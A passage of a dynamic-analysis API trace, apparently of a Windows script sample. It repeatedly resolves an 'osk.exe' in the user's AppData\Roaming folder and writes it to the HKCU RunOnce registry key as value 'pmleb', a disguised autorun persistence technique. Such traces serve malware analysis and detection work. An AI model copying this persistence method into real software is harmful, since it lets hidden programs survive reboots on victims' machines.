lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.359] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.360] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0082.360] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.360] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x70 [0082.360] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.360] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0082.360] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.360] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.361] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.361] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.361] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.361] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.361] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.361] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.361] RegCloseKey (hKey=0x280) returned 0x0 [0082.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.361] SetTimer (hWnd=0x20280, nIDEvent=0x20eb, uElapse=0xa, lpTimerFunc=0x0) returned 0x20eb [0082.362] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.373] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.373] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.374] KillTimer (hWnd=0x20280, uIDEvent=0x20eb) returned 1 [0082.374] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.374] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.374] IUnknown:Release (This=0x787518) returned 0x1 [0082.374] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.374] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.374] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.375] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.375] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0082.375] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.375] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x71 [0082.375] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.376] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0082.376] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.376] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.376] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.376] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.376] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.376] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.376] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.377] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.377] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.377] RegCloseKey (hKey=0x280) returned 0x0 [0082.377] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.377] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.377] SetTimer (hWnd=0x20280, nIDEvent=0x20ec, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ec [0082.377] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.389] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.389] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.389] KillTimer (hWnd=0x20280, uIDEvent=0x20ec) returned 1 [0082.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.389] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.390] IUnknown:Release (This=0x787518) returned 0x1 [0082.390] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.390] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.390] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.390] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.390] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0082.390] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.390] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x72 [0082.391] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.391] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0082.391] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.392] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.392] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.392] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.392] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.392] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.392] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.392] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.392] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.392] RegCloseKey (hKey=0x280) returned 0x0 [0082.393] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.393] SetTimer (hWnd=0x20280, nIDEvent=0x20ed, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ed [0082.393] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.406] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.406] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.406] KillTimer (hWnd=0x20280, uIDEvent=0x20ed) returned 1 [0082.406] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.406] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.406] IUnknown:Release (This=0x787518) returned 0x1 [0082.406] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), 